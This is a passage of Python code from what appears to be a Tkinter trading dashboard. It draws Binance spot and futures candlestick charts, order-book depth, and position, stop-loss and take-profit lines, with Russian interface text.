mylist5=mylist3['asks'] #list
if i==0:
app.Scale_TP.set(0)
app.Scale_SL.set(0)
#print(myTup11[1])
if MS=='SPOT' and i==0:
if GS=='CANDLE 5m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='5m', limit=288))
elif GS=='CANDLE 1m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=288))
elif GS=='CANDLE 15m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='15m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='15m', limit=288))
elif GS=='CANDLE 30m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='30m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='30m', limit=288))
elif GS=='CANDLE 1h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1h', limit=288))
elif GS=='CANDLE 4h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='4h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='4h', limit=288))
elif GS=='CANDLE 1d':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1d', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1d', limit=288))
myDicGr1 = myTupSpK[1] #dict
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
#print (myDicGr1[1][1])
elif MS=='FUTURES' and i==0:
if GS=='CANDLE 5m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='5m', limit=288)) #tupl
elif GS=='CANDLE 1m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=288)) #tupl
elif GS=='CANDLE 15m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='15m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='15m', limit=288)) #tupl
elif GS=='CANDLE 30m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='30m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='30m', limit=288)) #tupl
elif GS=='CANDLE 1h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1h', limit=288)) #tupl
elif GS=='CANDLE 4h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='4h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='4h', limit=288)) #tupl
elif GS=='CANDLE 1d':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1d', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1d', limit=288)) #tupl
my_file_Kl = open(grSmb + "_KL.txt", "w")
my_file_Kl.write(str(myTupFtK))
my_file_Kl.close()
#print(myTup12)
myDicGr1 = myTupFtK[1]
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
if i==0:
PnL_Pos_L = ''
PnL_Pos_S = ''
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
PnL_Pos = 0
app.graph_Cn.delete("all")
app.graph_VV.delete("all")
app.graph_BTCD.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
#print(grZm)
#print (grMd)
TT0 = time.mktime(time.localtime())*1000
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
GAP = app.graph_Cn.create_line(points,fill="blue",width=1,dash=(4,2))
if MS == 'FUTURES':
GPEP_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1,dash=(20,10))
GPEP_S = app.graph_Cn.create_line((0,0,0,0),fill="black",width=1,dash=(20,10))
GPLP = app.graph_Cn.create_line((0,0,0,0),fill="orange",width=3,dash=(20,10))
GPSP = app.graph_Cn.create_line((0,0,0,0),fill="red",width=3,dash=(20,10))
GPSP_txt = app.graph_Cn.create_text((0,0),text='',fill="red",font=grFt_12)
GPPP = app.graph_Cn.create_line((0,0,0,0),fill="green",width=3,dash=(20,10))
GPPP_txt = app.graph_Cn.create_text((0,0),text='',fill="green",font=grFt_12)
GPPP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#66CDAA",width=1,dash=(50,50))
GPPP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#36a355",text='')
GPSP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1,dash=(50,50))
GPSP_Tmp_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GEPt = app.graph_Cn.create_text(0,0,text='',fill="black",font=grFt_12)
GLO_L = []
GLO_L_txt = []
GLO_S = []
GLO_S_txt = []
for j in range (100):
GLO_L_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1)
GLO_L.append(GLO_L_L)
GLO_L_L_txt = app.graph_Cn.create_text((0,0),fill="#336633",text='')
GLO_L_txt.append(GLO_L_L_txt)
GLO_S_S = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1)
GLO_S.append(GLO_S_S)
GLO_S_S_txt = app.graph_Cn.create_text((0,0),fill="#DC143C",text='')
GLO_S_txt.append(GLO_S_S_txt)
GOS_TP = app.graph_Cn.create_rectangle((0,0,0,0),fill="#66CDAA")
GOS_SL = app.graph_Cn.create_rectangle((0,0,0,0),fill="pink")
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue",font=grFt_10)
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue",font=grFt_10)
elif prSt < 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue",font=grFt_10)
yp=1180
ypi=0
while yp > -500:
points=[]
if GS=='CANDLE 5m':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1m':
yp_s = 10*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 15m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 30m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 4h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1d':
yp_s = 14*4
yp = 1180 - ypi*yp_s
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
if GS=='CANDLE 5m':
tm=TT0/1000+36000-ypi*3600
elif GS=='CANDLE 1m':
tm=TT0/1000+7200-ypi*600
elif GS=='CANDLE 15m':
tm=TT0/1000+108000-ypi*7200
elif GS=='CANDLE 30m':
tm=TT0/1000+216000-ypi*14400
elif GS=='CANDLE 1h':
tm=TT0/1000+432000-ypi*43200
elif GS=='CANDLE 4h':
tm=TT0/1000+1728000-ypi*172800
elif GS=='CANDLE 1d':
tm=TT0/1000+10368000-ypi*1209600
tm1 = datetime.datetime.fromtimestamp(tm)
if GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h':
tmm=tm1.strftime("%H:%M")
elif GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
tmm=tm1.strftime("%d.%m")
app.graph_Tb.create_text(1180 - ypi*yp_s,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*yp_s,10,text=tmm)
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1)):
myDicGr1TT = myDicGr1[mm]
myDicGr1BTCD = myDicBTCD[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
if GS=='CANDLE 5m':
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*4
elif GS=='CANDLE 1m':
xxp = 700 + ((((xx - TT0)/1000)+30)/60)*4
elif GS=='CANDLE 15m':
xxp = 700 + ((((xx - TT0)/1000)+450)/900)*4
elif GS=='CANDLE 30m':
xxp = 700 + ((((xx - TT0)/1000)+900)/1800)*4
elif GS=='CANDLE 1h':
xxp = 700 + ((((xx - TT0)/1000)+1800)/3600)*4
elif GS=='CANDLE 4h':
xxp = 700 + ((((xx - TT0)/1000)+7200)/14400)*4
elif GS=='CANDLE 1d':
xxp = 700 + ((((xx - TT0)/1000)+43200)/86400)*4
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
if mm == 0:
yypVMax = 0
yypTMax = 0
for nm in range(len(myDicGr1)):
if float(myDicGr1[nm][5])>yypVMax:
#print(myDicGr1[nm][5])
yypVMax = float(myDicGr1[nm][5])
if float(myDicGr1[nm][8])>yypTMax:
#print(myDicGr1[nm][5])
yypTMax = float(myDicGr1[nm][8])
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
app.graph_BTCD.create_line(-100,50,1000,50,fill='black',dash=(1,1))
else:
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
if float(myDicGr1BTCD[1]) < float(myDicGr1BTCD[4]):
app.graph_BTCD.create_line(xxp,50,xxp,50-((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='green')
else:
app.graph_BTCD.create_line(xxp,50,xxp,50+((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='red')
if xxp > 1000:
app.graph_Cn.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Cn.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
app.graph_VV.create_line(xxp,100,xxp,yyp5,fill=flc)
app.graph_VV.create_line(xxp+1,0,xxp+1,yyp6,fill='black')
if MS == 'FUTURES':
BnFAcc=bot.userPositionInfo()
if len(BnFAcc)>0:
sTmp=''
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if str(BnFAcc1['symbol'])==grSmb and float(BnFAcc1['positionAmt']) != 0:
y_liq = float(BnFAcc1['liquidationPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPLP, -500,y_liq,800,y_liq)
y_liq = float(BnFAcc1['entryPrice'])
PEP=float(BnFAcc1['entryPrice'])
PPA = float(BnFAcc1['positionAmt'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
#print (BnFAcc1['positionSide'])
if str(BnFAcc1['positionSide'])=='LONG':
app.graph_Cn.coords(GPEP_L, -500,y_liq,800,y_liq)
PnL_Pos_L = BnFAcc1['unRealizedProfit']
if str(BnFAcc1['positionSide'])=='SHORT':
#print (BnFAcc1['positionSide'])
app.graph_Cn.coords(GPEP_S, -500,y_liq,800,y_liq)
PnL_Pos_S = BnFAcc1['unRealizedProfit']
app.graph_Cn.coords(GEPt, 105, y_liq)
app.graph_Cn.itemconfigure(GEPt,text='Позиция: ' + str(BnFAcc1['positionSide']) + ' Цена: '+ str(float(BnFAcc1['entryPrice']))+'\n'+'Кол-во: ' + str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))+ ' USDT')
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_It.append('-')
TO_Tpl_Tmp.append(TO_It)
#print(TO_Tpl_Tmp)
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPSP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPSP_txt, 600,y_liq)
app.graph_Cn.itemconfigure(GPSP_txt,text=('Stop-Loss. Цена: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
PSP = float(BnFAcc1['stopPrice'])
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_SL.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_TP.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if y_liq > 1000:
Ltmp = app.graph_Cn.configure()
#print(Ltmp['scrollregion'][4])
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],Ltmp1[1],Ltmp1[2],y_liq+200))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
PPP=y_liq
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_TP.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_SL.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
PnL_dif = -(PEP * PPA - float(BnFAcc1['stopPrice']) * PPA)
app.graph_Cn.coords(GPPP, -500,y_liq,800,y_liq)
app.graph_Cn.coords(GPPP_txt,600,y_liq)
app.graph_Cn.itemconfigure(GPPP_txt,text=('Take-profit. Цена: '+ str(BnFAcc1['stopPrice']) + '\n') + "%.2f" % (PnL_dif) + ' USDT')
if y_liq < -500:
Ltmp = app.graph_Cn.configure()
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],y_liq-200,Ltmp1[2],Ltmp1[3]))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='LIMIT' and str(BnFAcc1['type'])=='LIMIT':
#print(BnFAcc1)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
lo = TO_CC+1
TO_SCh = True
if TO_CC > 0:
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_It[0] == str(BnFAcc1['positionSide']) and TO_It[1] == str(BnFAcc1['side']) and float(TO_It[2]) == float(BnFAcc1['price']) and float(TO_It[3]) == float(BnFAcc1['origQty']):
app.Tree_Ord.item(nm, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
TO_Tpl_Tmp[nm-1][5]='+'
TO_SCh = False
#print(TO_It[0],TO_It[1],TO_It[2],TO_It[3])
if TO_SCh == True and float(BnFAcc1['price']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Ord.insert(parent='',index='end',iid=lo,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['side']),str(BnFAcc1['price']),str(BnFAcc1['origQty']),
str(BnFAcc1['origType'])))
lo +=1
#print(TO_Tpl_Tmp)
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
TO_Tpl_Tmp2=[]
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
TO_Tpl_Tmp2.append(app.Tree_Ord.item(nm)["values"])
#print(TO_Tpl_Tmp)
#print(TO_Tpl_Tmp2)
for nm in range(1,TO_CC+1):
if nm-1 <= len(TO_Tpl_Tmp)-1 and len(TO_Tpl_Tmp)>0 :
if TO_Tpl_Tmp[nm-1][5] == '-' or TO_Tpl_Tmp[nm-1][5] == '':
TO_Tpl_Tmp2[nm-1][2] = '0'
TO_Tpl_Tmp2[nm-1][3] = '0'
kk=0
nm_d=False
for nm in range(1,TO_CC+1):
TO_It = app.Tree_Ord.item(nm)["values"]
if float(TO_Tpl_Tmp2[nm-1][2]) == 0 and float(TO_Tpl_Tmp2[nm-1][3]) == 0 and kk<=len(TO_Tpl_Tmp2):
nm_d=True
km=False
for mn in range(kk,len(TO_Tpl_Tmp2)):
#print(mm)
if float(TO_Tpl_Tmp2[mn][2])!=0 and float(TO_Tpl_Tmp2[mn][3])!=0 and km==False:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[mn][0],TO_Tpl_Tmp2[mn][1],TO_Tpl_Tmp2[mn][2],TO_Tpl_Tmp2[mn][3],TO_Tpl_Tmp2[mn][4],TO_Tpl_Tmp2[mn][5]))
kk=mn+1
#print(nn,kk,mm)
km=True
if nm_d==True and km==False:
kk=len(TO_Tpl_Tmp2)+1
else:
#print(nn,kk)
if nm_d==True and kk<TO_CC:
app.Tree_Ord.item(nm, values=(TO_Tpl_Tmp2[kk][0],TO_Tpl_Tmp2[kk][1],TO_Tpl_Tmp2[kk][2],TO_Tpl_Tmp2[kk][3],TO_Tpl_Tmp2[kk][4],TO_Tpl_Tmp2[kk][5]))
if TO_Tpl_Tmp2[kk][0] == 'LONG':
app.Tree_Ord.item(nm,tags=('long'))
elif TO_Tpl_Tmp2[kk][0] == 'SHORT':
app.Tree_Ord.item(nm,tags=('short'))
app.Tree_Ord.tag_configure('long', background='#d6f8d6')
app.Tree_Ord.tag_configure('short', background='#fce7e7')
kk +=1
if kk > len(TO_Tpl_Tmp2) and nm<=TO_CC+1:
app.Tree_Ord.delete(nm)
elif len(BnFAcc) == 0:
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC > 0:
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
TO_CL=app.Tree_Ord.get_children()
TO_CC=len(TO_CL)
if TO_CC >= len(GLO_L) and TO_CC >= len(GLO_S):
jj = TO_CC
elif TO_CC <= len(GLO_L) and len(GLO_L) >= len(GLO_S):
jj = len(GLO_L)
elif TO_CC <= len(GLO_S) and len(GLO_S) >= len(GLO_L):
jj = len(GLO_S)
GLO_L_Ci = 0
GLO_S_Ci = 0
for nm in range(jj):
if nm < TO_CC:
TO_It = app.Tree_Ord.item(nm+1)["values"]
if str(TO_It[0])== 'LONG':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_L[GLO_L_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_L_txt[GLO_L_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_L_txt[GLO_L_Ci],text='Ордер LONG\n'+str(TO_It[2]))
GLO_L_Ci +=1
elif str(TO_It[0])== 'SHORT':
y_liq = float(TO_It[2])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_S[GLO_S_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_S_txt[GLO_S_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_S_txt[GLO_S_Ci],text='Ордер SHORT\n'+str(TO_It[2]))
GLO_S_Ci +=1
if len(GLO_L) > GLO_L_Ci-1:
for nm in range (int(GLO_L_Ci),len(GLO_L)):
app.graph_Cn.coords(GLO_L[nm],0,0,0,0)
app.graph_Cn.coords(GLO_L_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_L_txt[nm],text='')
if len(GLO_S) > GLO_S_Ci-1:
for nm in range (int(GLO_S_Ci),len(GLO_S)):
app.graph_Cn.coords(GLO_S[nm],0,0,0,0)
app.graph_Cn.coords(GLO_S_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_S_txt[nm],text='')
#Order Book Graph
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
#y0 = grMd + grSt/2 - ((float(mylist4[m][0])-yI0)/prSt)* grSt
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if m==0:
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Cn.coords(GAP, -500, y0, 800, y0)
app.graph_Cn.coords(GAPt, 805, y0)
if len(PnL_Pos_L) > 0 and len(PnL_Pos_S) > 0:
sTmp = '\n' + 'Цена: ' + str(float(mylist4[m][0]))
else:
sTmp = 'Цена: ' + str(float(mylist4[m][0]))
if len(PnL_Pos_L) > 0:
sTmp += '\n'+'Long PnL: ' + str(PnL_Pos_L)
if len(PnL_Pos_S) > 0:
sTmp += '\n'+'Short PnL: ' + str(PnL_Pos_S)
app.graph_Cn.itemconfigure(GAPt,text=sTmp)
#______________Таймер построения Свечного графика SPOT и FUTURES пары
class Timer_Candle_Summ:
def __init__(self):
global TE_CndSm
global ss
global yI
global Lo
while True:
if PS1 == True:
sys_msg = ' Свечной график сравнения SPOT/FUTURES' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = True
break
if should_run_S:
for i in range(400):
if not should_run_S:
sys_msg = ' Свечной график сравнения SPOT/FUTURES' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_S:
if i==0:
sys_msg = ' Свечной график сравнения SPOT/FUTURES ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = False
if i > 0:
time.sleep(0.5)
myTup_DSp = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
mylist5_Sp=mylist3_Sp['asks'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=500)) #tupl
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
mylist5_Ft=mylist3_Ft['asks'] #list
#print(myTup11[1])
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#Если один купил а другой продал, то это buy или sell?
#Отвечу так: в истории торгов binance зеленым подсвечиваются сделки, у которых isBuyerMaker == false,
#и маджентой - у кого true
#sss41 = "BNBUSDT - trades"
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI0=float(myDicGr1Sp[287][1])
#print (myDicGr1[1][1])
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI0=float(myDicGr1Ft[287][1])
#print (yI0)
if i==0:
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
app.graph_Sm.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
ss = ""
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
GAP_Sp = app.graph_Sm.create_line(points,fill="blue",width=1,dash=(4,2))
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue")
